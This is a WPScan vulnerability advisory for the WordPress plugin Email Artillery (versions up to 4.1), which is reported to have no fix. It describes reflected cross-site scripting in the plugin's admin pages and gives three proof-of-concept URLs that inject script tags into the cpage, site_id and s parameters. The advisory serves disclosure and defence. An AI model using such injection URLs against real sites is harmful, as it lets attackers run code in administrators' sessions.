WordPress Plugin Vulnerabilities

Email Artillery <= 4.1 - Multiple Reflected Cross-Site Scripting

Description

The plugin does not sanitise, validate or escape some user input before outputting back in pages leading to Reflected Cross-Site Scripting issues which will be executed in the context of a logged in admin

Proof of Concept

https://example.com/wp-admin/admin.php?page=etmbu-all-posts&s=yes&markdone=no&cpage="><script>alert(%2FXSS%2F)<%2Fscript>

https://example.com/wp-admin/admin.php?page=etmbu-all-emails&invalid=yes&site_id="><script>alert(/XSS-SiteID/)</script>&s="><script>alert(/XSS-S/)</script>

https://example.com/wp-admin/admin.php?page=etmbu-all-emails&unsub=yes&site_id="><script>alert(%2FXSS-SiteID%2F)<%2Fscript>&s="><script>alert(%2FXSS-S%2F)<%2Fscript>

Affects Plugins

Plugin icon
email-artillery
No known fix

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
35e1e5dd-5aa5-4481-b7ed-2ddf00a08986

Timeline

Publicly Published
2021-08-16 (about 2 years ago)
Added
2021-08-16 (about 2 years ago)
Last Updated
2021-08-16 (about 2 years ago)

Other

Published
Title
Published
2024-04-01
Title
Colibri Page Builder < 1.0.270 - Contributor+ Stored XSS
Published
2022-10-29
Title
Glossary <= 3.1.2 - Contributor+ Stored XSS
Published
2023-10-26
Title
Neon text < 1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
Published
2017-08-24
Title
FG Joomla to WordPress < 3.31.0 - XSS in the AJAX Imported
Published
2022-11-02
Title
Video Thumbnails <= 2.12.3 - Admin+ Stored XSS